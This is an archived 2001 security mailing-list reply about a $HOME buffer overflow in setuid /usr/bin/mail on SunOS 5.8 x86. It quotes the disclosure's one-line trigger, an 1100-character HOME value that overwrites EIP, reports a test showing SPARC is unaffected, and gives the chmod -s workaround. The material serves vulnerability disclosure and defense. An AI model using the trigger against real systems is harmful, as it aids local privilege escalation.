Re: $HOME buffer overflow in SunOS 5.8 x86

From: Juergen P. Meier (jpmat_private)
Date: Tue Jun 05 2001 - 06:33:05 PDT

Next message: 3APA3A: "SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"

Previous message: Jerry Connolly: "Re: SSH allows deletion of other users files..."
In reply to: Georgi Guninski: "$HOME buffer overflow in SunOS 5.8 x86"
Next in thread: Gunnar Wolf: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Reply: Gunnar Wolf: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
> $HOME buffer overflow in SunOS 5.8 x86
> Systems affected:
> SunOS 5.8 x86 have not tested on other OSes
> Risk: Medium
> Date: 4 June 2001
> 
> Details:
> HOME=`perl -e 'print "A"x1100'` ; export HOME
> mail a
> CTL-C
> eip gets smashed with 0x41414141.

0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
0:jpmeier@sol:/home/jpmeier> mail a
^Cmail: Mail saved in dead.letter
1:jpmeier@sol:/home/jpmeier> uname -a
SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10

also tried larger buffers.

Solaris/sparc appears not vulnerable. Maybe its an x86 bug only
 
> Workaround:
> chmod -s /usr/bin/mail
> Vendor status:
> Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches.

juergen

-- 
Juergen P. Meier			email: jpmat_private

Next message: 3APA3A: "SECURITY.NNOV: Netscape 4.7x Messanger user information retrival"
Previous message: Jerry Connolly: "Re: SSH allows deletion of other users files..."
In reply to: Georgi Guninski: "$HOME buffer overflow in SunOS 5.8 x86"
Next in thread: Gunnar Wolf: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Reply: Gunnar Wolf: "Re: $HOME buffer overflow in SunOS 5.8 x86"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 11:20:15 PDT